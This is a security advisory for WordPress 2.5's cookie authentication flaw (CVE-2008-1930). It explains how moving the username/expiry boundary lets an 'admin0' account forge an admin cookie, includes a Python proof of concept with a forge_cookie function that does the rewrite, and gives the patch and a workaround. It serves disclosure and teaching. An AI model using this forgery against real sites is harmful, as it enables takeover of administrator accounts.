WordPress Cookie Integrity Protection Unauthorized Access Vulnerability

Posted by ArtHack on May 2nd, 2008 and filed under Vulnerability Notices.

Affected systems:
WordPress 2.5
Unaffected systems:
WordPress 2.5.1
Description:
——————————————————————————–
BUGTRAQ ID: 28935
CVE(CAN) ID: CVE-2008-1930

WordPress is a free blogging platform.

Beginning with version 2.5, WordPress authenticates logged-in users with a cryptographically protected cookie. The new cookie has the form:

"wordpress_" . COOKIEHASH = USERNAME . "|" . EXPIRY_TIME . "|" . MAC

The MAC is computed with a key that is itself derived from USERNAME and EXPIRY_TIME. Because USERNAME and EXPIRY_TIME are concatenated with no separator in the MAC computation, an attacker can change the cookie without changing the MAC as long as the concatenated string USERNAME . EXPIRY_TIME stays the same: the boundary between the two fields can be moved, and the MAC does not notice.

To exploit this, an attacker registers an account whose username begins with "admin" and ends in digits (for instance "admin0"), logs in, and then rewrites the returned cookie so that the trailing digits of the username become the leading digits of EXPIRY_TIME. The MAC still verifies, and the cookie now authenticates the attacker as the admin account.
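The field-boundary shift described above, as an added example that is not part of the original advisory or of WordPress itself. It re-implements the 2.5 cookie scheme (HMAC-MD5 over USERNAME . EXPIRY_TIME, keyed by a hash of the same data) and the 2.5.1 fix (a "|" separator inside the authenticated data) in Python; the secret key, the username "admin0", the timestamps and the function names are constructed for the demonstration.

```python
import hashlib
import hmac

# Constructed secret for the example. A real WordPress install derives its
# secret from the SECRET_KEY salt in wp-config.php / the database.
SECRET_KEY = b"example-installation-secret"


def hash_hmac_md5(data: str, key: bytes) -> str:
    """Equivalent of PHP hash_hmac('md5', $data, $key)."""
    return hmac.new(key, data.encode(), hashlib.md5).hexdigest()


def mac_vulnerable(username: str, expiration: str) -> str:
    """WordPress 2.5 scheme: key and MAC are both computed over
    USERNAME . EXPIRY_TIME with no separator between the two fields."""
    data = username + expiration
    key = hash_hmac_md5(data, SECRET_KEY)
    return hash_hmac_md5(data, key.encode())


def mac_fixed(username: str, expiration: str) -> str:
    """WordPress 2.5.1 scheme: the '|' separator makes the field boundary
    part of the authenticated data, so moving it changes the MAC."""
    data = username + "|" + expiration
    key = hash_hmac_md5(data, SECRET_KEY)
    return hash_hmac_md5(data, key.encode())


def issue_cookie(username: str, expiration: int, mac_fn) -> str:
    """Server side: build USERNAME|EXPIRY_TIME|MAC at login."""
    return f"{username}|{expiration}|{mac_fn(username, str(expiration))}"


def validate_cookie(cookie: str, mac_fn, now: int):
    """Server side: return the authenticated username, or None."""
    try:
        username, expiration, mac = cookie.split("|")
        # int() accepts a leading '0', just as a PHP (int) cast does.
        if int(expiration) < now:
            return None
    except ValueError:
        return None
    if not hmac.compare_digest(mac_fn(username, expiration), mac):
        return None
    return username


def forge_cookie(cookie: str, target_user: str):
    """Attacker side: move the USERNAME/EXPIRY_TIME boundary to the left.

    Works when the attacker's own username is target_user followed only by
    digits, e.g. 'admin0' -> target 'admin'. The concatenation
    USERNAME . EXPIRY_TIME is unchanged, so the old MAC still verifies
    under the vulnerable scheme. Returns None if the name does not fit."""
    username, expiration, mac = cookie.split("|")
    suffix = username[len(target_user):]
    if not username.startswith(target_user) or not suffix.isdigit():
        return None
    return f"{target_user}|{suffix}{expiration}|{mac}"


def demo(now: int = 1_200_000_000):
    """Run the attack against both schemes.

    Returns (user accepted by the 2.5 scheme, user accepted by the 2.5.1 scheme)."""
    expiry = 1_210_000_000  # constructed timestamp past `now`
    # Attacker registers 'admin0' (registration is open) and logs in normally.
    legit_vuln = issue_cookie("admin0", expiry, mac_vulnerable)
    legit_fixed = issue_cookie("admin0", expiry, mac_fixed)
    forged_vuln = forge_cookie(legit_vuln, "admin")
    forged_fixed = forge_cookie(legit_fixed, "admin")
    return (validate_cookie(forged_vuln, mac_vulnerable, now),
            validate_cookie(forged_fixed, mac_fixed, now))


if __name__ == "__main__":
    print(demo())  # ('admin', None)
```

The forged cookie "admin|01210000000|MAC" is accepted by the 2.5-style check because "admin" + "01210000000" is byte-for-byte the string "admin0" + "1210000000" that the MAC was computed over, and the leading zero does not change the integer value of the expiry. With the separator in the authenticated data the same rewrite produces "admin|01210000000" instead of "admin0|1210000000", so the MAC no longer matches.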

<*Source: Steven J. Murdoch (http://www.cl.cam.ac.uk/users/sjm217/)

Links: http://marc.info/?l=bugtraq&m=119550270403703&w=2
http://marc.info/?l=bugtraq&m=120922721931109&w=2
http://secunia.com/advisories/29965/
*>

Recommendation:
——————————————————————————–
Workaround:

* In the Membership section of General Settings, uncheck "Anyone can register" to stop new accounts from being created. Note that this only prevents new registrations; an attacker who already holds an account with a suitable name can still forge a cookie until the upgrade is applied.

Vendor patch:

WordPress
---------
The vendor has released an upgrade that fixes this security issue; download it from the vendor's homepage:

http://wordpress.org/latest.zip
